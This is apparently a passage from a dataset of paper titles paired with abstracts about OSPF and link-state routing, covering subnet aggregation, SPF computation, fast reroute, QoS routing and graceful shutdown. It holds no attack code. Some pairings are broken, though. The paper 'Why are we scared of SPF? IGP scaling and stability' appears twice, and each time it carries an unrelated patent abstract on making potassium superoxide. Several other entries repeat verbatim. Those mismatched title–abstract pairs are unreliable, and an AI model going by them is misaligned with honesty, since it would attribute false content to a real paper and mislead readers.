issues with packet-level mechanisms. --- paper_title: Voice over the internet: A tutorial discussing problems and solutions associated with alternative transport paper_content: This article provides a tutorial overview of voice over the Internet, examining the effects of moving voice traffic over the packet switched Internet and comparing this with the effects of moving voice over the more traditional circuit-switched telephone system. The emphasis of this document is on areas of concern to a backbone service provider implementing Voice over IP (VoIP). We begin by providing overviews of the Plain Old Telephone Service (POTS) and VoIP. We then discuss techniques service providers can use to help preserve service quality on their VoIP networks. Next, we briefly discuss Voice over ATM (VoATM) as an alternative to VoIP. Finally, we offer some conclusions. --- paper_title: Optimal configuration of OSPF aggregates paper_content: Open shortest path first (OSPF) is a popular protocol for routing within an autonomous system (AS) domain. In this paper, we address the important practical problem of configuring OSPF aggregates to minimize the error in OSPF shortest path computations due to subnet aggregation. We first develop an optimal dynamic programming algorithm that, given an upper bound k on the number of aggregates to be advertised and a weight-assignment function for the aggregates, computes the k aggregates that result in the minimum cumulative error in the shortest path computations for all source-destination subnet pairs. Subsequently, we tackle the problem of assigning weights to OSPF aggregates such that the cumulative error in the computed shortest paths is minimized. We demonstrate that, while for certain special cases (e.g., unweighted cumulative error) efficient optimal algorithms for the weight-assignment problem can be devised, the general problem itself is /spl Nscr//spl Pscr/-hard. Consequently, we have to rely on search heuristics to solve the weight-assignment problem. To the best of our knowledge, our work is the first to address the algorithmic issues underlying the configuration of OSPF aggregates and to propose efficient configuration algorithms that are provably optimal for many practical scenarios. --- paper_title: Why are we scared of SPF? IGP scaling and stability paper_content: The present invention relates to a process for preparing high purity inorganic higher oxides of the alkali and alkaline earth metals by subjecting the hydroxide of the alkali or alkaline earth metal to a radio frequency discharge sustained in oxygen. The invention is particularly adaptable to the production of high purity potassium superoxide (KO2) by subjecting potassium hydroxide to glow discharge sustained in oxygen under the pressure of about 0.75 to 1.00 torr. --- paper_title: An efficient algorithm for OSPF subnet aggregation paper_content: Multiple addresses within an OSPF area can be aggregated and advertised together to other areas. This process is known as address aggregation and is used to reduce router computational overheads and memory requirements and to reduce the network bandwidth consumed by OSPF messages. The downside of address aggregation is that it leads to information loss and consequently sub-optimal (non-shortest path) routing of data packets. The resulting difference (path selection error) between the length of the actual forwarding path and the shortest path varies between different sources and destinations. This paper proves that the path selection error from any source to any destination can be bounded using only parameters describing the destination area. Based on this, the paper presents an efficient algorithm that generates the minimum number of aggregates subject to a maximum allowed path selection error. A major operational benefit of our algorithm is that network administrators can select aggregates for an area based solely on the topology of the area without worrying about remaining areas of the OSPF network. The other benefit is that the algorithm enables trade-offs between the number of aggregates and the bound on the path selection error. The paper also evaluates the algorithm's performance on random topologies. Our results show that in some cases, the algorithm is capable of reducing the number of aggregates by as much as 50% with only a relatively small introduction of maximum path selection error. --- paper_title: Reverse path forwarding of broadcast packets paper_content: A broadcast packet is for delivery to all nodes of a network. Algorithms for accomplishing this delivery through a store-and-forward packet switching computer network include (1) transmission of separately addressed packets, (2) multidestination addressing, (3) hot potato forwarding, (4) spanning tree forwarding, and (5) source based forwarding. To this list of algorithms we add (6) reverse path forwarding, a broadcast routing method which exploits routing procedures and data structures already available for packet switching. Reverse path forwarding is a practical algorithm for broadcast routing in store-and-forward packet switching computer networks. The algorithm is described as being practical because it is not optimal according to metrics developed for its analysis in this paper, and also because it can be implemented in existing networks with less complexity than that required for the known alternatives. --- paper_title: Topology Broadcast Algorithms paper_content: Abstract This paper describes efficient distributed algorithms to broadcast network topology to all nodes in a network. They also build minimum depth spanning trees, one rooted at each node. The broadcast of the topology takes place simultaneously with the building of the spanning trees, in a way that insures that each node receives information exactly once. The algorithms are extended to work in presence of link and node failures. --- paper_title: Models for IP/MPLS routing performance: convergence, fast reroute, and QoS impact paper_content: We show how to model the black-holing and looping of traffic during an Interior Gateway Protocol (IGP) convergence event at an IP network and how to significantly improve both the convergence time and packet loss duration through IGP parameter tuning and algorithmic improvement. We also explore some congestion avoidance and congestion control algorithms that can significantly improve stability of networks in the face of occasional massive control message storms. Specifically we show the positive impacts of prioritizing Hello and Acknowledgement packets and slowing down LSA generation and retransmission generation on detecting congestion in the network. For some types of video, voice signaling and circuit emulation applications it is necessary to reduce traffic loss durations following a convergence event to below 100 ms and we explore that using Fast Reroute algorithms based on Multiprotocol Label Switching Traffic Engineering (MPLS-TE) that effectively bypasses IGP convergence. We explore the scalability of primary and backup MPLS-TE tunnels where MPLS-TE domain is in the backbone-only or edge-to-edge. We also show how much extra backbone resource is needed to support Fast Reroute and how can that be reduced by taking advantage of Constrained Shortest Path (CSPF) routing of MPLS-TE and by reserving less than 100% of primary tunnel bandwidth during Fast Reroute. --- paper_title: Why are we scared of SPF? IGP scaling and stability paper_content: The present invention relates to a process for preparing high purity inorganic higher oxides of the alkali and alkaline earth metals by subjecting the hydroxide of the alkali or alkaline earth metal to a radio frequency discharge sustained in oxygen. The invention is particularly adaptable to the production of high purity potassium superoxide (KO2) by subjecting potassium hydroxide to glow discharge sustained in oxygen under the pressure of about 0.75 to 1.00 torr. --- paper_title: Models for IP/MPLS routing performance: convergence, fast reroute, and QoS impact paper_content: We show how to model the black-holing and looping of traffic during an Interior Gateway Protocol (IGP) convergence event at an IP network and how to significantly improve both the convergence time and packet loss duration through IGP parameter tuning and algorithmic improvement. We also explore some congestion avoidance and congestion control algorithms that can significantly improve stability of networks in the face of occasional massive control message storms. Specifically we show the positive impacts of prioritizing Hello and Acknowledgement packets and slowing down LSA generation and retransmission generation on detecting congestion in the network. For some types of video, voice signaling and circuit emulation applications it is necessary to reduce traffic loss durations following a convergence event to below 100 ms and we explore that using Fast Reroute algorithms based on Multiprotocol Label Switching Traffic Engineering (MPLS-TE) that effectively bypasses IGP convergence. We explore the scalability of primary and backup MPLS-TE tunnels where MPLS-TE domain is in the backbone-only or edge-to-edge. We also show how much extra backbone resource is needed to support Fast Reroute and how can that be reduced by taking advantage of Constrained Shortest Path (CSPF) routing of MPLS-TE and by reserving less than 100% of primary tunnel bandwidth during Fast Reroute. --- paper_title: Optimal configuration of OSPF aggregates paper_content: Open shortest path first (OSPF) is a popular protocol for routing within an autonomous system (AS) domain. In this paper, we address the important practical problem of configuring OSPF aggregates to minimize the error in OSPF shortest path computations due to subnet aggregation. We first develop an optimal dynamic programming algorithm that, given an upper bound k on the number of aggregates to be advertised and a weight-assignment function for the aggregates, computes the k aggregates that result in the minimum cumulative error in the shortest path computations for all source-destination subnet pairs. Subsequently, we tackle the problem of assigning weights to OSPF aggregates such that the cumulative error in the computed shortest paths is minimized. We demonstrate that, while for certain special cases (e.g., unweighted cumulative error) efficient optimal algorithms for the weight-assignment problem can be devised, the general problem itself is /spl Nscr//spl Pscr/-hard. Consequently, we have to rely on search heuristics to solve the weight-assignment problem. To the best of our knowledge, our work is the first to address the algorithmic issues underlying the configuration of OSPF aggregates and to propose efficient configuration algorithms that are provably optimal for many practical scenarios. --- paper_title: OSPF: Anatomy of an Internet Routing Protocol paper_content: From the Publisher: ::: Written for TCP/IP network administrators, protocol designers, and network application developers, this book gives the most complete and practical view ever into the inner workings of Internet routing. The book focuses on OSPF (Open Shortest Path First), a common TCP/IP routing protocol that provides robust and efficient routing support in the most demanding Internet environments. A methodical and detailed description of the protocol is offered and OSPF's role within the wider context of a TCP/IP network is demonstrated. ::: Practical throughout, the book provides not only a theoretical description of Internet routing, but also a real-world look into how theory translates into practice. It shows how algorithms are implemented, and how the routing protocols function in a working network where transmission lines and routers routinely break down. ::: You will find clear explanations of such routing fundamentals as how a router forwards packets, IP addressing, CIDR (Classless Inter-Domain Routing), the routing table, Internet routing architecture, and the two main routing technologies: Distance Vector and link-state algorithms. OSPF is discussed in depth, with an examination of the rationale behind OSPF's design decisions and how it has evolved to keep pace with the rapidly changing Internet environment. OSPF topics covered by the book include the following: ::: OSPF areas and virtual links NBMA (Nonbroadcast multi-access) and Point-to-MultiPoint network segments OSPF configuration and management Interaction with other routing protocols OSPF cryptographic authentication OSPF protocol extensions, including the Demand Circuit extensions and the multicast extensions to OSPF (MOSPF) An OSPF FAQ ::: ::: IP multicast and multicast routing are also discussed. Methods for debugging routing problems are explained, including a catalog of available debugging tools. The book also offers side-by-side comparisons of all the unicast and multicast routing protocols currently in use in the Internet. ::: You will come away from this book with a sophisticated understanding of Internet routing and of the OSPF protocol in particular. Moreover, the book's practical focus will enable you to put this deeper understanding to work in your network environment. --- paper_title: An efficient algorithm for OSPF subnet aggregation paper_content: Multiple addresses within an OSPF area can be aggregated and advertised together to other areas. This process is known as address aggregation and is used to reduce router computational overheads and memory requirements and to reduce the network bandwidth consumed by OSPF messages. The downside of address aggregation is that it leads to information loss and consequently sub-optimal (non-shortest path) routing of data packets. The resulting difference (path selection error) between the length of the actual forwarding path and the shortest path varies between different sources and destinations. This paper proves that the path selection error from any source to any destination can be bounded using only parameters describing the destination area. Based on this, the paper presents an efficient algorithm that generates the minimum number of aggregates subject to a maximum allowed path selection error. A major operational benefit of our algorithm is that network administrators can select aggregates for an area based solely on the topology of the area without worrying about remaining areas of the OSPF network. The other benefit is that the algorithm enables trade-offs between the number of aggregates and the bound on the path selection error. The paper also evaluates the algorithm's performance on random topologies. Our results show that in some cases, the algorithm is capable of reducing the number of aggregates by as much as 50% with only a relatively small introduction of maximum path selection error. --- paper_title: Enhancing the network scalability of link-state routing protocols by reducing their flooding overhead paper_content: We consider scalability issues of routing protocols for large-scale networks. Link-state routing protocols play an important role in generalized multiprotocol label switching (GMPLS) networks based on photonic technologies as well as in conventional packet-based IP networks. The scalability of a link-state routing protocol mainly depends on the overhead of protocol-related messages, which are disseminated by flooding. We propose ways to reduce this overhead in link-state routing protocols such as OSPF and IS-IS, and also present extensions to OSPF that provide support for our techniques. The basic approach is to limit the sets of neighboring nodes in the flooding of link-state information, while maintaining reliability in the distribution of link-state information. We also report on extensive simulation to evaluate the performance of our algorithm in terms of reducing the flooding overhead. Our algorithm provides improved network scalability as well as efficient and reliable convergence of routing information. --- paper_title: A survey of QoS routing solutions for mobile ad hoc networks paper_content: In mobile ad hoc networks (MANETs), the provision of quality of service (QoS) guarantees is much more challenging than in wireline networks, mainly due to node mobility, multihop communications, contention for channel access, and a lack of central coordination. QoS guarantees are required by most multimedia and other time- or error-sensitive applications. The difficulties in the provision of such guarantees have limited the usefulness of MANETs. However, in the last decade, much research attention has focused on providing QoS assurances in MANET protocols. The QoS routing protocol is an integral part of any QoS solution since its function is to ascertain which nodes, if any, are able to serve applications? requirements. Consequently, it also plays a crucial role in data session admission control. This document offers an up-to-date survey of most major contributions to the pool of QoS routing solutions for MANETs published in the period 1997?2006. We include a thorough overview of QoS routing metrics, resources, and factors affecting performance and classify the protocols found in the literature. We also summarize their operation and describe their interactions with the medium access control (MAC) protocol, where applicable. This provides the reader with insight into their differences and allows us to highlight trends in protocol design and identify areas for future research. --- paper_title: QoS Routing Mechanisms and OSPF Extensions paper_content: This memo describes extensions to the OSPF [Moy98] protocol to support QoS routes. The focus of this document is on the algorithms used to compute QoS routes and on the necessary modifications to OSPF to support this function, e.g., the information needed, its format, how it is distributed, and how it is used by the QoS path selection process. Aspects related to how QoS routes are established and managed are also briefly discussed. The goal of this document is to identify a framework and possible approaches to allow deployment of QoS routing capabilities with the minimum possible impact to the existing routing infrastructure. --- paper_title: Reverse path forwarding of broadcast packets paper_content: A broadcast packet is for delivery to all nodes of a network. Algorithms for accomplishing this delivery through a store-and-forward packet switching computer network include (1) transmission of separately addressed packets, (2) multidestination addressing, (3) hot potato forwarding, (4) spanning tree forwarding, and (5) source based forwarding. To this list of algorithms we add (6) reverse path forwarding, a broadcast routing method which exploits routing procedures and data structures already available for packet switching. Reverse path forwarding is a practical algorithm for broadcast routing in store-and-forward packet switching computer networks. The algorithm is described as being practical because it is not optimal according to metrics developed for its analysis in this paper, and also because it can be implemented in existing networks with less complexity than that required for the known alternatives. --- paper_title: A reliable, efficient topology broadcast protocol for dynamic networks paper_content: We present, prove correctness for, and evaluate a protocol for the reliable broadcast of topology and link-state information in a multihop communication network with a dynamic topology, such as a wireless network with mobile nodes. The protocol is called topology broadcast based on reverse path forwarding (TBRPF), and uses the concept of reverse-path forwarding (RPF) to broadcast link-state updates in the reverse direction along the spanning tree formed by the minimum-hop paths from all nodes to the source of the update TBRPF uses the topology information received along the broadcast trees to compute the minimum-hop paths that form the trees themselves, and is the first topology broadcast protocol based on RPF with this property. The use of minimum-hop trees instead of shortest-path trees (based on link costs) results in less frequent changes to the broadcast trees and therefore less communication cost to maintain the trees. Simulations show that TBRPF achieves up to a 98% reduction in communication cost compared to flooding in a 20-node network. --- paper_title: Topology Broadcast Algorithms paper_content: Abstract This paper describes efficient distributed algorithms to broadcast network topology to all nodes in a network. They also build minimum depth spanning trees, one rooted at each node. The broadcast of the topology takes place simultaneously with the building of the spanning trees, in a way that insures that each node receives information exactly once. The algorithms are extended to work in presence of link and node failures. --- paper_title: Quality of service based routing: a performance perspective paper_content: Recent studies provide evidence that Quality of Service (QoS) routing can provide increased network utilization compared to routing that is not sensitive to QoS requirements of traffic. However, there are still strong concerns about the increased cost of QoS routing, both in terms of more complex and frequent computations and increased routing protocol overhead. The main goals of this paper are to study these two cost components, and propose solutions that achieve good routing performance with reduced processing cost. First, we identify the parameters that determine the protocol traffic overhead, namely (a) policy for triggering updates, (b) sensitivity of this policy, and (c) clamp down timers that limit the rate of updates. Using simulation, we study the relative significance of these factors and investigate the relationship between routing performance and the amount of update traffic. In addition, we explore a range of design options to reduce the processing cost of QoS routing algorithms, and study their effect on routing performance. Based on the conclusions of these studies, we develop extensions to the basic QoS routing, that can achieve good routing performance with limited update generation rates. The paper also addresses the impact on the results of a number of secondary factors such as topology, high level admission control, and characteristics of network traffic. --- paper_title: Packet Switching in Radio Channels: Part I -- Carrier sense multiple-access modes and their throughput-delay characteristics paper_content: Radio communication is considered as a method for providing remote terminal access to computers. Digital byte streams from each terminal are partitioned into packets (blocks) and transmitted in a burst mode over a shared radio channel. When many terminals operate in this fashion, transmissions may conflict with and destroy each other. A means for controlling this is for the terminal to sense the presence of other transmissions; this leads to a new method for multiplexing in a packet radio environment: carrier sense multiple access (CSMA). Two protocols are described for CSMA and their throughput-delay characteristics are given. These results show the large advantage CSMA provides as compared to the random ALOHA access modes. --- paper_title: Multi-point Relaying Techniques with OSPF on Ad Hoc Networks paper_content: Incorporating multi-hop ad hoc wireless networks in theIP infrastructure is an effort to which a growing communityparticipates. One instance of such activity is theextension of the most widely deployed interior gatewayrouting protocol on the Internet, OSPF (Open Shortest PathFirst), for operation on Mobile Ad hoc Networks (MANETs).Such extension allows OSPF to work on heterogeneousnetworks encompassing both wired and wireless routers,which may self-organize as multi-hop wireless subnetworks,and be mobile. Three solutions have been proposed for thisextension, among which two based on techniques derivedfrom multi-point relaying (MPR). This paper analyzes thesetwo approaches and identifies some fundamental discussionitems that pertain to adapting OSPF mechanisms to multihopwireless networking, before concluding with a proposalfor a unique, merged solution based on this analysis. --- paper_title: Experience in black-box OSPF measurement paper_content: OSPF (Open Shortest Path First) is a widely used intra-domain routing protocol in IP networks. Internal processing delays in OSPF implementations impact the speed at which updates propagate in the network, the load on individual routers, and the time needed for both intra-domain and inter-domain routing to reconverge following an internal topology or a configuration change. An OSPF user, such as an Internet Service Provider, typically has no access to the software implementation, and no way to estimate these delays directly. In this paper, we present black-box methods (i.e., measurements that rely only on external observations) for estimating and trending delays for key internal tasks in OSPF: processing Link State Advertisements (LSAs), performing Shortest Path First calculations, updating the Forwarding Information Base, and flooding LSAs. Corresponding measurements are reported for production routers from Cisco Systems. To help validate the methodology, black-box and white-box (i.e., measurements that rely on internal instrumentation) are reported for a open source OSPF implementation, GateD. --- paper_title: Introduction to Algorithms paper_content: From the Publisher: ::: The updated new edition of the classic Introduction to Algorithms is intended primarily for use in undergraduate or graduate courses in algorithms or data structures. Like the first edition,this text can also be used for self-study by technical professionals since it discusses engineering issues in algorithm design as well as the mathematical aspects. ::: In its new edition,Introduction to Algorithms continues to provide a comprehensive introduction to the modern study of algorithms. The revision has been updated to reflect changes in the years since the book's original publication. New chapters on the role of algorithms in computing and on probabilistic analysis and randomized algorithms have been included. Sections throughout the book have been rewritten for increased clarity,and material has been added wherever a fuller explanation has seemed useful or new information warrants expanded coverage. ::: As in the classic first edition,this new edition of Introduction to Algorithms presents a rich variety of algorithms and covers them in considerable depth while making their design and analysis accessible to all levels of readers. Further,the algorithms are presented in pseudocode to make the book easily accessible to students from all programming language backgrounds. ::: Each chapter presents an algorithm,a design technique,an application area,or a related topic. The chapters are not dependent on one another,so the instructor can organize his or her use of the book in the way that best suits the course's needs. Additionally,the new edition offers a 25% increase over the first edition in the number of problems,giving the book 155 problems and over 900 exercises thatreinforcethe concepts the students are learning. --- paper_title: Semi-Dynamic Shortest Paths and Breadth-First Search in Digraphs paper_content: We show how to maintain a shortest path tree of a general directed graph G with unit edge weights and n vertices, during a sequence of edge deletions or a sequence of edge insertions, in O(n) amortized time per operation using linear space. Distance queries can be answered in constant time, while shortest path queries can be answered in time linear in the length of the retrieved path. These results are extended to the case of integer edge weights in [1,C], with a bound of O(Cn) amortized time per operation. --- paper_title: The New Routing Algorithm for the ARPANET paper_content: The new ARPANET routing algorithm is an improvement over the old procedure in that it uses fewer network resources, operates on more realistic estimates of network conditions, reacts faster to important network changes, and does not suffer from long-term loops or oscillations. In the new procedure, each node in the network maintains a database describing the complete network topology and the delays on all lines, and uses the database describing the network to generate a tree representing the minimum delay paths from a given root node to every other network node. Because the traffic in the network can be quite variable, each node periodically measures the delays along its outgoing lines and forwards this information to all other nodes. The delay information propagates quickly through the network so that all nodes can update their databases and continue to route traffic in a consistent and efficient manner. An extensive series of tests were conducted on the ARPANET, showing that line overhead and CPU overhead are both less than two percent, most nodes learn of an update within 100 ms, and the algorithm detects congestion and routes packets around congested areas. --- paper_title: Scheduling routing table calculations to achieve fast convergence in OSPF protocol paper_content: Fast convergence to topology changes is now a key requirement in routing infrastructures while reducing the routing protocol’s processing overhead continues to be as important as before. In this paper, we examine the problem of scheduling routing table updates in link state routing protocols. Commercial routers typically use a hold time based scheme to limit the number of routing table updates as new LSAs arrive at the router. The hold time schemes limit the number of routing table updates at the expense of increased delay in convergence to the new topology, which is clearly not acceptable any more. We analyze the performance of different hold time schemes and propose a new approach to schedule routing table updates, called LSA Correlation. Rather than using individual LSAs as triggers for routing table updates, LSA Correlation scheme correlates the information in the LSAs to identify the topology change that led to their generation. A routing table update is performed when a topology change has been identified. The analysis and simulation results presented in this paper suggest that the LSA Correlation scheme performs much better than the hold time based schemes for both isolated and large scale topology change scenarios. --- paper_title: New dynamic SPT algorithm based on a ball-and-string model paper_content: A key functionality in today's widely used interior gateway routing protocols such as OSPF and IS-IS involves the computation of a shortest path tree (SPT). In many existing commercial routers, the computation of an SPT is done from scratch following changes in the link states of the network. As there may coexist multiple SPTs in a network with a set of given link states, such recomputation of an entire SPT not only is inefficient but also causes frequent unnecessary changes in the topology of an existing SPT and creates routing instability. This paper presents a new dynamic SPT algorithm that makes use of the structure of the previously computed SPT. This algorithm is derived by recasting the SPT problem into an optimization problem in a dual linear programming framework, which can also be interpreted using a ball-and-string model. In this model, the increase (or decrease) of an edge weight in the tree corresponds to the lengthening (or shortening) of a string. By stretching the strings until each node is attached to a tight string, the resulting topology of the model defines an (or multiple) SPT(s). By emulating the dynamics of the ball-and-string model, we can derive an efficient algorithm that propagates changes in distances to all affected nodes in a natural order and in a most economical way. Compared with existing results, our algorithm has the best-known performance in terms of computational complexity as well as minimum changes made to the topology of an SPT. Rigorous proofs for correctness of our algorithm and simulation results illustrating its complexity are also presented. --- paper_title: Avoiding instability during graceful shutdown of OSPF paper_content: In this paper, we describe an enhancement to OSPF, called the IBB (I'll Be Back) capability, that enables other routers to use a router whose OSPF process is inactive for forwarding traffic for a certain period of time. The IBB capability can be used for avoiding route flaps that occur when the OSPF process is brought down in a router to facilitate protocol software upgrade, operating system upgrade, router ID change, AS and interface renumbering, etc. When the OSPF process in an IBB-capable router is inactive, it cannot adapt its forwarding table to reflect changes in network topology. This can lead to routing loops and/or black holes. We provide a detailed analysis of how and when loops or black holes are formed and propose solutions to prevent them. Using the GateD platform, we have developed an IBB extension to OSPF incorporating these solutions. Using this system in an experimental setup, we demonstrate that the overhead of the IBB extension is modest compared to the benefit it offers, and has good scaling behavior in terms of network size and the number of routers with inactive OSPF processes. --- paper_title: An Incremental Algorithm for a Generalization of the Shortest-Path Problem paper_content: Thegrammar problem, a generalization of the single-source shortest-path problem introduced by D. E. Knuth (Inform. Process. Lett.6(1) (1977), 1?5) is to compute the minimum-cost derivation of a terminal string from each nonterminal of a given context-free grammar, with the cost of a derivation being suitably defined. This problem also subsumes the problem of finding optimal hyperpaths in directed hypergraphs (under varying optimization criteria) that has received attention recently. In this paper we present an incremental algorithm for a version of the grammar problem. As a special case of this algorithm we obtain an efficient incremental algorithm for the single-source shortest-path problem with positive edge lengths. The aspect of our work that distinguishes it from other work on the dynamic shortest-path problem is its ability to handle “multiple heterogeneous modifications”: between updates, the input graph is allowed to be restructured by an arbitrary mixture of edge insertions, edge deletions, and edge-length changes. --- paper_title: Semi-Dynamic Shortest Paths and Breadth-First Search in Digraphs paper_content: We show how to maintain a shortest path tree of a general directed graph G with unit edge weights and n vertices, during a sequence of edge deletions or a sequence of edge insertions, in O(n) amortized time per operation using linear space. Distance queries can be answered in constant time, while shortest path queries can be answered in time linear in the length of the retrieved path. These results are extended to the case of integer edge weights in [1,C], with a bound of O(Cn) amortized time per operation. --- paper_title: The New Routing Algorithm for the ARPANET paper_content: The new ARPANET routing algorithm is an improvement over the old procedure in that it uses fewer network resources, operates on more realistic estimates of network conditions, reacts faster to important network changes, and does not suffer from long-term loops or oscillations. In the new procedure, each node in the network maintains a database describing the complete network topology and the delays on all lines, and uses the database describing the network to generate a tree representing the minimum delay paths from a given root node to every other network node. Because the traffic in the network can be quite variable, each node periodically measures the delays along its outgoing lines and forwards this information to all other nodes. The delay information propagates quickly through the network so that all nodes can update their databases and continue to route traffic in a consistent and efficient manner. An extensive series of tests were conducted on the ARPANET, showing that line overhead and CPU overhead are both less than two percent, most nodes learn of an update within 100 ms, and the algorithm detects congestion and routes packets around congested areas. --- paper_title: Avoiding instability during graceful shutdown of multiple OSPF routers paper_content: Many recent router architectures decouple the routing engine from the forwarding engine, allowing packet forwarding to continue even when the routing process is not active. This opens up the possibility of using the forwarding capability of a router even when its routing process is brought down for software upgrade or maintenance, thus avoiding the route flaps that normally occur when the routing process goes down. Unfortunately, current routing protocols, such as BGP, OSPF and IS-IS do not support such operation. In an earlier paper [1], we described an enhancement to OSPF, called the IBB (I'll Be Back) capability, that enables a router to continue forwarding packets while its routing process is inactive.When the OSPF process in an IBB-capable router is inactive, it cannot adapt its forwarding table to reflect changes in network topology. This can lead to routing loops and/or black holes. In this paper, we focus on the loop problem and provide a detailed analysis of how and when loops are formed and propose solutions to prevent them. We develop two necessary conditions for the formation of routing loops in the general case when multiple routers are inactive. These conditions can easily be checked by the neighbors of the inactive routers. Simulations on several network topologies showed that checking the two conditions together signaled a loop in most cases only when a loop actually existed. --- paper_title: New dynamic SPT algorithm based on a ball-and-string model paper_content: A key functionality in today's widely used interior gateway routing protocols such as OSPF and IS-IS involves the computation of a shortest path tree (SPT). In many existing commercial routers, the computation of an SPT is done from scratch following changes in the link states of the network. As there may coexist multiple SPTs in a network with a set of given link states, such recomputation of an entire SPT not only is inefficient but also causes frequent unnecessary changes in the topology of an existing SPT and creates routing instability. This paper presents a new dynamic SPT algorithm that makes use of the structure of the previously computed SPT. This algorithm is derived by recasting the SPT problem into an optimization problem in a dual linear programming framework, which can also be interpreted using a ball-and-string model. In this model, the increase (or decrease) of an edge weight in the tree corresponds to the lengthening (or shortening) of a string. By stretching the strings until each node is attached to a tight string, the resulting topology of the model defines an (or multiple) SPT(s). By emulating the dynamics of the ball-and-string model, we can derive an efficient algorithm that propagates changes in distances to all affected nodes in a natural order and in a most economical way. Compared with existing results, our algorithm has the best-known performance in terms of computational complexity as well as minimum changes made to the topology of an SPT. Rigorous proofs for correctness of our algorithm and simulation results illustrating its complexity are also presented. --- paper_title: An overview of routing optimization for internet traffic engineering paper_content: Traffic engineering is an important mechanism for Internet network providers seeking to optimize network performance and traffic delivery. Routing optimization plays a key role in traffic engineering, finding efficient routes so as to achieve the desired network performance. In this survey we review Internet traffic engineering from the perspective of routing optimization. A taxonomy of routing algorithms in the literature is provided, dating from the advent of the TE concept in the late 1990s. We classify the algorithms into multiple dimensions: unicast/multicast, intra-/inter- domain, IP-/MPLS-based and offline/online TE schemes. In addition, we investigate some important traffic engineering issues, including robustness, TE interactions, and interoperability with overlay selfish routing. In addition to a review of existing solutions, we also point out some challenges in TE operation and important issues that are worthy of investigation in future research activities. --- paper_title: Constraint-Based Routing in the Internet: Basic Principles and Recent Research paper_content: Novel routing paradigms based on policies, quality of service (QoS) requirements, and packet content have been proposed for the Internet over the last decade. Constraint-based routing algorithms select a routing path satisfying constraints that are either administrative-oriented (policy routing) or service-oriented (QoS routing). The routes, in addition to satisfying constraints, are selected to reduce costs, balance network load, or increase security. In this article, we discuss several constraint-based routing approaches and explain their requirements, complexity, and recent research proposals. In addition, we illustrate how these approaches can be integrated with Internet label switching and QoS architectures. We also discuss examples of application-level routing techniques used in today's Internet. --- paper_title: A survey of IP and multiprotocol label switching fast reroute schemes paper_content: One of the desirable features of any network is its ability to keep services running despite a link or node failure. This ability is usually referred to as network resilience and has become a key demand from service providers. Resilient networks recover from a failure by repairing themselves automatically by diverting traffic from the failed part of the network to another portion of the network. This traffic diversion process should be fast enough to ensure that the interruption of service due to a link or node failure is either unnoticeable or as small as possible. The new path taken by a diverted traffic can be computed at the time a failure occurs through a procedure called rerouting. Alternatively the path can be computed before a failure occurs through a procedure called fast reroute. Much attention is currently being paid to fast reroute because service providers who are used to the 50-ms failure recovery time associated with SONET networks are demanding the same feature from IP and MPLS networks. While this requirement can easily be met in SONET because it operates at the physical layer, it is not easily met in IP and MPLS networks that operate above the physical layer. However, over the last few years, several schemes have been proposed for accomplishing 50-ms fast reroutes for IP and MPLS networks. The purpose of this paper is to provide a survey of the IP fast reroute and MPLS fast reroute schemes that have been proposed. --- paper_title: IP fast rerouting for single-link/node failure recovery paper_content: Failure recovery in IP networks is critical to high quality service provisioning. The main challenge is how to achieve fast recovery without introducing high complexity and resource usage. Today’s networks mainly use route recalculation and lower layer protection. However, route recalculation could take as long as seconds to complete; while lower layer protection usually requires considerable bandwidth redundancy. We present two fast rerouting algorithms to achieve recovery from single-link and single-node failures, respectively. The idea is to calculated backup paths in advance. When a failure is detected, the affected packets are immediately forwarded through backup paths to shorten the service disruption. This paper answers the following questions: 1. How to find backup paths? 2. How to coordinate routers during the rerouting without explicit signaling? 3. How to realize distributed implementation? The schemes react to failures very fast because there are no calculations on the fly. They are also cost efficient because no bandwidth reservation is required. Our schemes guarantee 100% failure recovery without any assumption on the primary paths. Simulations show that our schemes yield comparable performance to shortest path route recalculation. This work illuminates the possibility of using pure IP layer solutions to build highly survivable yet cost-efficient networks. --- paper_title: Disruption Free Topology Reconfiguration in OSPF Networks paper_content: A few modifications to software and/or hardware of routers have been proposed recently to avoid the transient micro loops that can occur during the convergence of link-state interior gateway protocols like IS-IS and OSPF. We1 propose in this paper a technique that does not require modifications to ISIS and OSPF, and that can be applied now by ISPs. Roughly, in the case of a manual modification of the state of a link, we progressively change the metric associated with this link to reach the required modification by ensuring that each step of the progression will be loop-free. The number of changes that are applied to a link to reach the targeted state by ensuring the transient consistency of the forwarding inside the network is minimized. Analysis performed on real regional and tier-1 ISP topologies show that the number of required transient changes is small. The solution can be applied in the case of link metric updates, manual set up, and shut down of links. --- paper_title: OSPF: Anatomy of an Internet Routing Protocol paper_content: From the Publisher: ::: Written for TCP/IP network administrators, protocol designers, and network application developers, this book gives the most complete and practical view ever into the inner workings of Internet routing. The book focuses on OSPF (Open Shortest Path First), a common TCP/IP routing protocol that provides robust and efficient routing support in the most demanding Internet environments. A methodical and detailed description of the protocol is offered and OSPF's role within the wider context of a TCP/IP network is demonstrated. ::: Practical throughout, the book provides not only a theoretical description of Internet routing, but also a real-world look into how theory translates into practice. It shows how algorithms are implemented, and how the routing protocols function in a working network where transmission lines and routers routinely break down. ::: You will find clear explanations of such routing fundamentals as how a router forwards packets, IP addressing, CIDR (Classless Inter-Domain Routing), the routing table, Internet routing architecture, and the two main routing technologies: Distance Vector and link-state algorithms. OSPF is discussed in depth, with an examination of the rationale behind OSPF's design decisions and how it has evolved to keep pace with the rapidly changing Internet environment. OSPF topics covered by the book include the following: ::: OSPF areas and virtual links NBMA (Nonbroadcast multi-access) and Point-to-MultiPoint network segments OSPF configuration and management Interaction with other routing protocols OSPF cryptographic authentication OSPF protocol extensions, including the Demand Circuit extensions and the multicast extensions to OSPF (MOSPF) An OSPF FAQ ::: ::: IP multicast and multicast routing are also discussed. Methods for debugging routing problems are explained, including a catalog of available debugging tools. The book also offers side-by-side comparisons of all the unicast and multicast routing protocols currently in use in the Internet. ::: You will come away from this book with a sophisticated understanding of Internet routing and of the OSPF protocol in particular. Moreover, the book's practical focus will enable you to put this deeper understanding to work in your network environment. --- paper_title: IGP Link Weight Assignment for Transient Link Failures paper_content: Intra-domain routing in IP backbone networks relies on link-state protocols such as IS-IS or OSPF. These protocols associate a weight (or cost) with each network link, and compute traffic routes based on these weight. However, proposed methods for selecting link weights largely ignore the issue of failures which arise as part of everyday network operations (maintenance, accidental, etc.). Changing link weights during a short-lived failure is impractical. However such failures are frequent enough to impact network performance. We propose a Tabu-search heuristic for choosing link weights which allow a network to function almost optimally during short link failures. The heuristic takes into account possible link failure scearios when choosing weights, thereby mitigating the effect of such failures. We find that the weights chosen by the heuristic can reduce link overload during transient link failures by as much as 40% at the cost of a small performance degradation in the absence of 